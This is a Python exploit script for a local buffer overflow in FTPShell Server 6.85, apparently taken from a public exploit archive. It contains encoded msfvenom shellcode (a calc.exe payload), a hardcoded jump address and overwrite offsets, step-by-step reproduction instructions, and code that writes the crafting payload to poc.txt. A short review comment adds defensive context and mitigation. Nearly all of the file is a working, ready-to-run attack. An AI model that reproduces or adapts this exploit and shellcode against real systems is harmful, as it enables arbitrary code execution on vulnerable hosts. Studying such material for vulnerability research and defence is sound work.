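#!/usr/bin/python
# Exploit Title: FTPShell Server 6.85 - Add Account Buffer Overflow
# Date: December 2nd, 2019
# Exploit Author: boku
# Vendor Homepage: http://www.ftpshell.com/index.htm
# Software Link: http://www.ftpshell.com/downloadserver.htm
# Program Name: FTPShell Server (Secure Plus edition)
# Version: Version 6.85
# Tested on: Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600
# Recreate:
# - Install FTPShell Server v6.85
# - open 'FTPShell Server Administrator'
# - Click button 'Manage FTP Accounts..'
# - Click button 'Configure accounts..'
# - Click button 'Add'
# - Run python script & transfer 'poc.txt' to windows box
# - Open 'poc.txt' & select-all, then copy
# - Paste poc.txt text blob into 'Login' text-box
# - Press button 'OK'; program will crash & shellcode will execute
#
# Review notes (defender's view):
# - The steps above go through the local administrator GUI ('Login' field of
#   the Add-account dialog), so reproducing this needs an interactive session
#   on the host running the console; nothing here talks to the FTP service.
# - Reliability rests on a fixed, non-rebased shell32.dll address (0x7c9ef4c9,
#   "aslr&rebase: false" per the author) that is specific to the XP SP3 build
#   listed above, and on the payload region being executable ("Execute&Read"
#   per the author's notes); presumably ASLR/DEP on later Windows versions
#   break both assumptions -- not verified here.
# - Mitigation: upgrade or retire FTPShell Server 6.85 and limit who can log
#   on to the host that runs the administrator console.

blt = '\033[92m[\033[0m+\033[92m]\033[0m '  # green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m '  # red fail bullet

OUTPUT_FILE = 'poc.txt'

# Instructions @ Crash:
#   1. mov ecx,[esi+7c0];
#   2. mov eax,[ecx]; lea edx, [ebp-4]; push edx;
#   3. call [eax+2c4];
# exploit leaves 708 bytes for shellcode.
SHELLCODE_ROOM = 0x2c4  # 708 decimal: the displacement used by 'call [eax+2c4]'
ECX_OFFSET = 1568       # buffer offset of the dword read by 'mov ecx,[esi+7c0]' (author's notes)

# msfvenom -p windows/exec CMD='calc.exe' -a x86 --platform windows -b '\x00' -v shellcode -f python
# x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"\xbb\x4f\x79\xd7\xce\xda\xde\xd9\x74\x24\xf4"
shellcode += b"\x5a\x2b\xc9\xb1\x31\x31\x5a\x13\x83\xea\xfc"
shellcode += b"\x03\x5a\x40\x9b\x22\x32\xb6\xd9\xcd\xcb\x46"
shellcode += b"\xbe\x44\x2e\x77\xfe\x33\x3a\x27\xce\x30\x6e"
shellcode += b"\xcb\xa5\x15\x9b\x58\xcb\xb1\xac\xe9\x66\xe4"
shellcode += b"\x83\xea\xdb\xd4\x82\x68\x26\x09\x65\x51\xe9"
shellcode += b"\x5c\x64\x96\x14\xac\x34\x4f\x52\x03\xa9\xe4"
shellcode += b"\x2e\x98\x42\xb6\xbf\x98\xb7\x0e\xc1\x89\x69"
shellcode += b"\x05\x98\x09\x8b\xca\x90\x03\x93\x0f\x9c\xda"
shellcode += b"\x28\xfb\x6a\xdd\xf8\x32\x92\x72\xc5\xfb\x61"
shellcode += b"\x8a\x01\x3b\x9a\xf9\x7b\x38\x27\xfa\xbf\x43"
shellcode += b"\xf3\x8f\x5b\xe3\x70\x37\x80\x12\x54\xae\x43"
shellcode += b"\x18\x11\xa4\x0c\x3c\xa4\x69\x27\x38\x2d\x8c"
shellcode += b"\xe8\xc9\x75\xab\x2c\x92\x2e\xd2\x75\x7e\x80"
shellcode += b"\xeb\x66\x21\x7d\x4e\xec\xcf\x6a\xe3\xaf\x85"
shellcode += b"\x6d\x71\xca\xeb\x6e\x89\xd5\x5b\x07\xb8\x5e"
shellcode += b"\x34\x50\x45\xb5\x71\xae\x0f\x94\xd3\x27\xd6"
shellcode += b"\x4c\x66\x2a\xe9\xba\xa4\x53\x6a\x4f\x54\xa0"
shellcode += b"\x72\x3a\x51\xec\x34\xd6\x2b\x7d\xd1\xd8\x98"
shellcode += b"\x7e\xf0\xba\x7f\xed\x98\x12\x1a\x95\x3b\x6b"

# A longer payload would make the padding below negative (and thus empty),
# silently shifting every offset; fail loudly instead.
if len(shellcode) > SHELLCODE_ROOM:
    raise ValueError('shellcode is %d bytes; only %d fit before the jmp-eax slot'
                     % (len(shellcode), SHELLCODE_ROOM))

# 3. call [eax+2c4];
# - Hexadecimal 0x2c4 = 708 decimal
# - The call [eax+2c4] instruction will pass execution to the address located at EAX+708
# - Setting [EAX+708] to an existing JMP EAX instruction will pass execution to our shellcode
# - 0x7c9ef4c9 jmp eax | (Execute&Read) shell32.dll; aslr&rebase: false
junk1 = b'\x90' * (SHELLCODE_ROOM - len(shellcode))
jmpEax = b'\xc9\xf4\x9e\x7c'

# 1. mov ecx,[esi+7c0];
# - ESI = 0x0012C108
# - esi+7c0 is in our supplied buffer, on the stack, at the time of the crash.
# - Control ECX @ offset 1568 bytes
junk2 = b'\x90' * (ECX_OFFSET - len(shellcode + junk1 + jmpEax))

# 2. mov eax,[ecx];
# - ECX = 0x0012B768 = PTR (located on Stack) to the beginning of our shellcode in the Heap
# - EIP 3-Byte Overwrite - '\x68\xb7\x12'
# - The '\x00' is supplied by the program when pressing the 'OK' button
# - eax is now set to the address of our shellcode.
ecx = b'\x68\xb7\x12'

payload = shellcode + junk1 + jmpEax + junk2 + ecx

try:
    # Binary mode: the buffer is raw bytes, and text-mode newline translation
    # (Windows) could alter it. The 'with' block closes the handle even if
    # write() raises; the old bare 'except:' also hid the real error.
    with open(OUTPUT_FILE, 'wb') as f:
        f.write(payload)
except (IOError, OSError) as exc:
    print(err + '%s failed to create: %s' % (OUTPUT_FILE, exc))
else:
    print(blt + '%s created successfully' % OUTPUT_FILE)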